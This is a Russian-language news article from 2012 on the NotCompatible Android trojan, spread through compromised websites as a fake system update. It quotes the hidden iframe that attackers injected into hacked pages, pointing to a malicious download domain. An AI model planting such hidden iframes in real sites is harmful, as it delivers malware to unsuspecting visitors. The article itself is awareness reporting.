Наука и технологии
Происшествия
04 мая 2012, 06:24 | Автор: Иван Рутов

Смартфоны на базе Android атаковал новый страшный вирус

Смартфоны на базе Android атаковал новый страшный вирус
фото:
Хакеры проникают в частные сети с помощью трояна для Android.

Эксперты из компании Lookout Mobile Security нашли серьезную троянскую программу для Android, которая распространяется через взломанные интернет-ресурсы, сообщают «Новости Америки».


Программа получила название NotCompatible. Ее создатели взламывают сайты и помещают в их код элемент iframe со ссылкой на троян. Сообщается, что NotCompatible выдает себя за обновление для Android. Заражение происходит в том случае, если пользователь не только загрузил файл, но и установил программу на устройство.


Программа распространялась путем добавления в код взломанных ресурсов специальной ссылки iframe на вредоносный файл. При открытии взломанного сайта, через браузер ОС Android, автоматически начинал загружаться файл Update.apk


По окончании загрузки на экране устройства отображается окно, в котором пользователь должен подтвердить установку приложения. Также для установки приложения на устройстве должна быть включена настройка «Unknown sources». В случае если эта опция отключена, загрузка будет автоматически заблокирована, добавляет Securitylab.


Контролируемые или скомпрометированные злоумышленниками сайты содержат в себе такой код:


<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-33713371337}”></iframe>


Сайт с таким Iframe отображает ложное сообщение о том, что для просмотра содержимого необходимо осуществить установку дополнительного ПО. При этом загрузка программы осуществляется не с официального магазина Google Play.


Разработчики вируса сделали такую схему только для устройств на базе Android, на других операционных системах или же на ОС стационарных ПК такая схема не работает, то есть загрузка вредоносного файла не осуществляется, уточняет Presscenter.ru.


В блоге Lookout Mobile Security пишут, что пока программа не выполняет вредоносных операций. Тем не менее, есть риск, что создатели NotCompatible доработают вредоносную программу и будут использовать ее для вторжения в частные сети путем преобразования зараженного устройства в прокси-сервер.


На данный момент количество сайтов, содержащих вредоносный код, небольшая и они не отличаются высокой посещаемостью. Lookout Mobile Security отмечает, что случай с NotCompatible стал одним из первых, когда сломанные сайты используются для распространения трояна для мобильных устройств. Обычно к такой схеме прибегают создатели вредоносных программ для PC. 

Вступайте в нашу группу в VK , чтобы быть в курсе событий в России и мире
материалы ПО ТЕМЕ
Скандал: покойного Стива Джобса клонировали для рекламы Android Скандал: покойного Стива Джобса клонировали для рекламы Android
Эксперты предсказали, сколько осталось жить iOS и Android Эксперты предсказали, сколько осталось жить iOS и Android
 
топ НОВОСТЕЙ
Все новости раздела
новости Наука и технологии
Все новости раздела